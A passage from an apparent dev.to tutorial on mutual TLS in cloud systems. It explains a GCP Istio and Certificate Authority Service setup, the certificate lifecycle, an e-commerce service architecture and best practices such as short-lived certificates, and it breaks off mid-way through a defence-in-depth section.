&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs1ej56x3askkriplk6qd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs1ej56x3askkriplk6qd.png" alt="Google cloud implementation pattern" width="800" height="210"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Understanding the GCP components:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;GKE Cluster (Google Kubernetes Engine):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Google's managed Kubernetes service&lt;/li&gt;
&lt;li&gt;Similar to AWS EKS but with tighter integration into GCP services&lt;/li&gt;
&lt;li&gt;Provides the foundation for running your containerized workloads&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Istio Control Plane (green box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Google's preferred service mesh solution (open-source)&lt;/li&gt;
&lt;li&gt;More feature-rich than AWS App Mesh out of the box&lt;/li&gt;
&lt;li&gt;Manages all the Envoy proxies across your workloads&lt;/li&gt;
&lt;li&gt;Handles traffic management, security policies, and observability&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Workloads with Envoy:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Each workload represents a microservice (similar to pods in AWS)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Workload 1, 2, and 3&lt;/strong&gt; could be your user service, product catalog, and checkout service&lt;/li&gt;
&lt;li&gt;Each has an Envoy sidecar proxy automatically injected by Istio&lt;/li&gt;
&lt;li&gt;Notice the mesh of mTLS connections - every workload can securely talk to every other workload&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Certificate Authority Service (CAS) - blue box:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Google's managed CA service&lt;/li&gt;
&lt;li&gt;Issues and manages X.509 certificates for your services&lt;/li&gt;
&lt;li&gt;Integrates directly with Istio to automate certificate distribution&lt;/li&gt;
&lt;li&gt;Supports certificate hierarchies and custom policies&lt;/li&gt;
&lt;li&gt;More enterprise-focused than AWS Private CA with features like HSM support&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Workload Identity (WI):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A unique GCP feature that ties Kubernetes service accounts to Google Cloud IAM&lt;/li&gt;
&lt;li&gt;Provides each workload with a cryptographic identity&lt;/li&gt;
&lt;li&gt;Ensures that Workload 1 can only access resources it's authorized for&lt;/li&gt;
&lt;li&gt;Eliminates the need to manage service account keys manually&lt;/li&gt;
&lt;li&gt;Think of it as giving each microservice its own secure Google account&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Secret Manager:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Stores private keys, API keys, and other sensitive data&lt;/li&gt;
&lt;li&gt;Encrypts secrets at rest with Google-managed or customer-managed keys&lt;/li&gt;
&lt;li&gt;Integrated with Workload Identity for secure access&lt;/li&gt;
&lt;li&gt;Provides versioning and audit logging of secret access&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The certificate flow:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;CAS → Istio&lt;/strong&gt;: Certificate Authority Service generates certificates and provides them to Istio&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Istio → Workloads&lt;/strong&gt;: Istio distributes certificates to each workload's Envoy proxy&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Workload Identity&lt;/strong&gt;: Authenticates each workload before allowing certificate retrieval&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;mTLS mesh&lt;/strong&gt;: All workload-to-workload communication uses mTLS (notice the bidirectional arrows between WL1, WL2, and WL3)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Key differences from AWS:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Istio is first-class&lt;/strong&gt;: GCP strongly supports Istio with managed versions and deep integration&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Workload Identity&lt;/strong&gt;: More sophisticated identity management than AWS Pod Identity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Full mesh by default&lt;/strong&gt;: Notice how all three workloads can talk to each other - GCP makes this zero-config with Istio&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Open-source focus&lt;/strong&gt;: Istio and Envoy are open-source, so you're not locked into GCP&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Why this architecture matters:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Automatic encryption&lt;/strong&gt;: Once Istio is installed, mTLS is enabled without code changes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Identity-based security&lt;/strong&gt;: Services are identified by cryptographic identity, not IP addresses&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No secret sprawl&lt;/strong&gt;: Workload Identity eliminates the need to distribute credentials&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Observability built-in&lt;/strong&gt;: Istio provides metrics, traces, and logs for every connection&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is Google's vision of "zero trust" networking where every connection is authenticated, authorized, and encrypted regardless of network location.&lt;/p&gt;

&lt;h2&gt;
  
  
  Certificate Lifecycle Management
&lt;/h2&gt;

&lt;p&gt;One of the biggest challenges with mTLS is managing certificate lifecycles. Here's how it works in cloud environments:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgialhrs1dsi1sw2f1ndt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgialhrs1dsi1sw2f1ndt.png" alt="Certificate lifecycle management" width="800" height="1000"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Understanding the certificate lifecycle:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Certificate Request (Service Starts):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;When a new service or pod starts up, it needs a certificate&lt;/li&gt;
&lt;li&gt;The service (or service mesh) sends a certificate signing request (CSR) to the Certificate Authority&lt;/li&gt;
&lt;li&gt;The request includes the service's identity (like &lt;code&gt;payment-service.prod.svc.cluster.local&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;2. Validation:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The CA verifies the request is legitimate&lt;/li&gt;
&lt;li&gt;Checks: Is this service authorized to request a certificate?&lt;/li&gt;
&lt;li&gt;Uses mechanisms like Workload Identity (GCP) or IAM roles (AWS)&lt;/li&gt;
&lt;li&gt;This prevents a rogue service from impersonating another service&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;3. Issuance:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Once validated, the CA issues the certificate&lt;/li&gt;
&lt;li&gt;The certificate includes the service identity, public key, expiration date, and CA signature&lt;/li&gt;
&lt;li&gt;This typically happens in seconds or milliseconds&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;4. Active (In Use):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The service is now using the certificate for all mTLS connections&lt;/li&gt;
&lt;li&gt;The certificate proves the service's identity to other services&lt;/li&gt;
&lt;li&gt;This is the normal operating state&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;5. Monitoring:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Continuous monitoring of certificate health&lt;/li&gt;
&lt;li&gt;Checks expiration dates, revocation status, and usage patterns&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Certificate lifetimes vary&lt;/strong&gt; (see note in diagram):

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Short-lived (24 hours)&lt;/strong&gt;: Highest security, common in modern service meshes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Medium (30-90 days)&lt;/strong&gt;: Balance of security and operational overhead&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Long (1 year)&lt;/strong&gt;: Not recommended - too much time for compromise&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;6. Near Expiry (30 days before expiration):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Automated systems detect the certificate is approaching expiration&lt;/li&gt;
&lt;li&gt;Triggers the renewal process well before expiration&lt;/li&gt;
&lt;li&gt;30 days is typical, but can be configured (some systems renew at 50% of lifetime)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;7. Renewal (Auto-renewal Triggered):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The service mesh automatically requests a new certificate&lt;/li&gt;
&lt;li&gt;The old certificate continues working while renewal happens&lt;/li&gt;
&lt;li&gt;Once the new certificate is issued, it gradually replaces the old one&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;This prevents&lt;/strong&gt; (see note in diagram):

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Service disruptions&lt;/strong&gt;: No downtime during rotation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Manual errors&lt;/strong&gt;: Humans forget or make mistakes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security gaps&lt;/strong&gt;: Expired certificates mean no authentication&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;8. Back to Active:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The new certificate is now in use&lt;/li&gt;
&lt;li&gt;The old certificate may have a grace period before fully expiring&lt;/li&gt;
&lt;li&gt;The cycle continues&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Alternative paths:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Revoked (Security Incident):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If a private key is compromised or a service is breached&lt;/li&gt;
&lt;li&gt;The certificate can be immediately revoked&lt;/li&gt;
&lt;li&gt;Other services will refuse connections from this certificate&lt;/li&gt;
&lt;li&gt;The service must get a new certificate before resuming operations&lt;/li&gt;
&lt;li&gt;Ends the lifecycle prematurely&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Expired (Renewal Failed):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If automatic renewal fails (CA unavailable, network issues, configuration problems)&lt;/li&gt;
&lt;li&gt;The certificate expires and becomes invalid&lt;/li&gt;
&lt;li&gt;Services will reject connections from expired certificates&lt;/li&gt;
&lt;li&gt;This typically triggers alerts and requires immediate attention&lt;/li&gt;
&lt;li&gt;The service must request a new certificate to resume operations&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Why automation is critical:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Imagine managing this manually for hundreds or thousands of services:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You'd need to track expiration dates for every certificate&lt;/li&gt;
&lt;li&gt;Rotate them before expiration without causing downtime&lt;/li&gt;
&lt;li&gt;Ensure no service uses an old certificate&lt;/li&gt;
&lt;li&gt;Respond immediately to security incidents&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;With automation, this entire lifecycle happens without human intervention, certificates rotate every 24 hours safely, and security incidents trigger immediate revocation.&lt;/p&gt;

&lt;h2&gt;
  
  
  Real-World Example: E-commerce Platform
&lt;/h2&gt;

&lt;p&gt;Let's see how mTLS secures a cloud-based e-commerce platform. This example shows where TLS and mTLS are used in a realistic production environment:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff1v3csoe6kcs0x4yhg4g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff1v3csoe6kcs0x4yhg4g.png" alt="e-commerce platform" width="800" height="555"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Let's trace a customer's journey through this system:&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Customer-Facing Layer
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mobile App and Web Browser:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your customers interact with your platform through these interfaces&lt;/li&gt;
&lt;li&gt;They use standard HTTPS (TLS) to connect&lt;/li&gt;
&lt;li&gt;Customers don't have certificates - they authenticate with login credentials&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Edge Layer - The Security Boundary
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;CDN (CloudFront/Akamai/etc.):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Content Delivery Network that caches static content&lt;/li&gt;
&lt;li&gt;Uses regular TLS to serve images, CSS, JavaScript to customers&lt;/li&gt;
&lt;li&gt;Provides DDoS protection and global distribution&lt;/li&gt;
&lt;li&gt;This is where the public internet meets your infrastructure&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;API Gateway (red box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Critical transition point&lt;/strong&gt; where security changes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Incoming&lt;/strong&gt;: Accepts TLS connections from the CDN (public-facing)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Outgoing&lt;/strong&gt;: Uses mTLS for all internal service communications&lt;/li&gt;
&lt;li&gt;Acts as the "trust boundary" - everything behind it requires mutual authentication&lt;/li&gt;
&lt;li&gt;Validates user JWT tokens or session cookies before forwarding requests&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Application Layer - The mTLS Zone
&lt;/h3&gt;

&lt;p&gt;This is where your business logic lives, and every connection requires mTLS:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Product Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Manages the product catalog&lt;/li&gt;
&lt;li&gt;API Gateway calls it to display products to customers&lt;/li&gt;
&lt;li&gt;Cart Service calls it to validate products being added&lt;/li&gt;
&lt;li&gt;Connected to Product DB to fetch inventory details&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Cart Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Manages shopping cart operations&lt;/li&gt;
&lt;li&gt;Talks to Product Service to verify item details&lt;/li&gt;
&lt;li&gt;Talks to Inventory Service to check stock availability&lt;/li&gt;
&lt;li&gt;Stores cart data in Redis Cache for fast access&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;User Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Handles user profiles and preferences&lt;/li&gt;
&lt;li&gt;Authenticates user sessions&lt;/li&gt;
&lt;li&gt;Order Service calls it to get shipping addresses&lt;/li&gt;
&lt;li&gt;Connected to User DB for persistent storage&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Order Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Orchestrates the order creation process&lt;/li&gt;
&lt;li&gt;Calls Payment Service to process transactions&lt;/li&gt;
&lt;li&gt;Calls Inventory Service to reserve stock&lt;/li&gt;
&lt;li&gt;Calls User Service to get customer details&lt;/li&gt;
&lt;li&gt;Stores completed orders in Order DB&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Payment Service (dark red box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Most sensitive service&lt;/strong&gt; - handles financial transactions&lt;/li&gt;
&lt;li&gt;Protected by mTLS on all sides&lt;/li&gt;
&lt;li&gt;Only Order Service can call it (enforced by mTLS certificates)&lt;/li&gt;
&lt;li&gt;Communicates with external Payment Gateway using mTLS&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Inventory Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Tracks stock levels across warehouses&lt;/li&gt;
&lt;li&gt;Called by both Cart and Order services&lt;/li&gt;
&lt;li&gt;Prevents overselling by managing reservations&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Data Layer - Database Security
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;All database connections use mTLS:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Product DB&lt;/strong&gt;: Stores product catalog data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;User DB&lt;/strong&gt;: Contains sensitive customer information&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Order DB&lt;/strong&gt;: Stores order history and transaction records&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Redis Cache&lt;/strong&gt;: Fast in-memory data store for cart sessions&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Why mTLS for databases?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Prevents unauthorized services from accessing data&lt;/li&gt;
&lt;li&gt;Even if an attacker breaches your network, they can't connect to databases without valid certificates&lt;/li&gt;
&lt;li&gt;Provides audit trail of which services accessed what data&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  External Services
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Payment Gateway (dark red):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Third-party service (Stripe, PayPal, etc.)&lt;/li&gt;
&lt;li&gt;Requires mTLS for PCI DSS compliance&lt;/li&gt;
&lt;li&gt;Your Payment Service must present a valid certificate&lt;/li&gt;
&lt;li&gt;The gateway also presents its certificate to you&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Shipping API:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Integration with shipping providers (FedEx, UPS, etc.)&lt;/li&gt;
&lt;li&gt;Uses mTLS to ensure only your Order Service can create shipments&lt;/li&gt;
&lt;li&gt;Prevents fraudulent shipping labels&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Example: Customer Purchases a Product
&lt;/h3&gt;

&lt;p&gt;Let's trace the mTLS connections when a customer buys a product:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Customer clicks "Buy Now"&lt;/strong&gt; → TLS → CDN → API Gateway&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;API Gateway → User Service&lt;/strong&gt; (mTLS): Verify user is logged in&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;API Gateway → Cart Service&lt;/strong&gt; (mTLS): Get cart contents&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cart Service → Product Service&lt;/strong&gt; (mTLS): Validate product details&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cart Service → Inventory Service&lt;/strong&gt; (mTLS): Check stock availability&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;API Gateway → Order Service&lt;/strong&gt; (mTLS): Create order&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Order Service → Payment Service&lt;/strong&gt; (mTLS): Process payment&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Payment Service → External Payment Gateway&lt;/strong&gt; (mTLS): Charge credit card&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Order Service → Inventory Service&lt;/strong&gt; (mTLS): Reserve stock&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Order Service → Shipping API&lt;/strong&gt; (mTLS): Create shipping label&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Order Service → Order DB&lt;/strong&gt; (mTLS): Save order record&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Every single internal connection (steps 2-11) uses mTLS.&lt;/strong&gt; This means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Each service verifies the identity of the caller&lt;/li&gt;
&lt;li&gt;An attacker can't impersonate the Payment Service to steal payment data&lt;/li&gt;
&lt;li&gt;If the Cart Service is compromised, it still can't access the Order DB (no valid certificate)&lt;/li&gt;
&lt;li&gt;Audit logs show exactly which service made each request&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Security Benefits in This Architecture
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Isolation&lt;/strong&gt;: Even if an attacker compromises the Product Service, they can't access the Payment Service without its certificate&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Least Privilege&lt;/strong&gt;: Each service only has certificates for the connections it needs&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compliance&lt;/strong&gt;: Meets PCI DSS requirements for payment processing&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Auditability&lt;/strong&gt;: Every connection is logged with the service identity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Zero Trust&lt;/strong&gt;: Network location doesn't matter - a service must prove its identity regardless&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This is a production-grade architecture used by major e-commerce platforms to protect millions of transactions daily.&lt;/p&gt;

&lt;h2&gt;
  
  
  Benefits and Trade-offs
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Benefits
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Strong Authentication&lt;/strong&gt;: Both parties verify each other's identity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Zero Trust Architecture&lt;/strong&gt;: No implicit trust based on network location&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Encryption&lt;/strong&gt;: All data in transit is encrypted&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compliance&lt;/strong&gt;: Meets regulatory requirements (PCI DSS, HIPAA, SOC 2)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Auditability&lt;/strong&gt;: Clear record of which services communicate&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Trade-offs
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Complexity&lt;/strong&gt;: More moving parts to manage&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Performance&lt;/strong&gt;: Additional handshake overhead (typically 1-5ms)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Certificate Management&lt;/strong&gt;: Requires robust PKI infrastructure&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Debugging&lt;/strong&gt;: Encrypted traffic is harder to troubleshoot&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Initial Setup&lt;/strong&gt;: Steeper learning curve&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Best Practices for Cloud mTLS
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Use Short-Lived Certificates
&lt;/h3&gt;

&lt;p&gt;One of the most important security practices is using certificates that expire quickly:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1u9ghyptw5awxi10tf7f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1u9ghyptw5awxi10tf7f.png" alt="short-lived certificates" width="800" height="308"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why 24-hour certificates improve security:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reduced Blast Radius:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If an attacker steals a certificate's private key, they can only use it for 24 hours&lt;/li&gt;
&lt;li&gt;Compare this to a 1-year certificate - an attacker has 365 days to exploit it&lt;/li&gt;
&lt;li&gt;Even if you detect a breach, short-lived certs naturally expire quickly&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: If a developer accidentally commits a private key to GitHub, it's only valid until tomorrow&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Automatic Rotation:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;With 24-hour certs, automation isn't optional - it's required&lt;/li&gt;
&lt;li&gt;This forces you to build robust certificate rotation systems from day one&lt;/li&gt;
&lt;li&gt;Your systems become resilient to certificate expiration issues&lt;/li&gt;
&lt;li&gt;You catch configuration problems within 24 hours instead of discovering them a year later&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Less Manual Intervention:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Nobody can manage daily certificate rotation manually&lt;/li&gt;
&lt;li&gt;This eliminates human error (forgetting to renew, typos in configuration)&lt;/li&gt;
&lt;li&gt;No more "emergency" certificate renewals at 2 AM&lt;/li&gt;
&lt;li&gt;Operators don't need to track expiration dates&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;All paths lead to better security:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Short-lived certificates force good practices&lt;/li&gt;
&lt;li&gt;Automation reduces errors&lt;/li&gt;
&lt;li&gt;Limited validity period contains breaches&lt;/li&gt;
&lt;li&gt;The system becomes "self-healing" with automatic rotation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Traditional thinking&lt;/strong&gt;: "Long-lived certificates are easier to manage"&lt;br&gt;
&lt;strong&gt;Modern reality&lt;/strong&gt;: "Short-lived certificates are safer and actually easier when automated"&lt;/p&gt;
&lt;h3&gt;
  
  
  2. Automate Everything
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Certificate issuance&lt;/li&gt;
&lt;li&gt;Certificate rotation&lt;/li&gt;
&lt;li&gt;Certificate revocation&lt;/li&gt;
&lt;li&gt;Monitoring and alerting&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  3. Use Service Mesh
&lt;/h3&gt;

&lt;p&gt;Service meshes like Istio, Linkerd, or AWS App Mesh handle mTLS automatically:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Transparent to application code&lt;/li&gt;
&lt;li&gt;Automatic certificate rotation&lt;/li&gt;
&lt;li&gt;Built-in observability&lt;/li&gt;
&lt;li&gt;Policy enforcement&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  4. Implement Defense in Depth
&lt;/h3&gt;

&lt;p&gt;mTLS shouldn't be your only security measure. It's one layer in a comprehensive security strategy:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjn48bwcpqtfzsidwc6zy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjn48bwcpqtfzsidwc6zy.png" alt="defence in depth" width="800" height="104"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Understanding each security layer:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layer 1: Network Policies (Foundation)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Kubernetes NetworkPolicy or cloud security groups&lt;/li&gt;
&lt;li&gt;Controls which pods/services can even attempt to connect&lt;/li&gt;
&lt;li&gt;
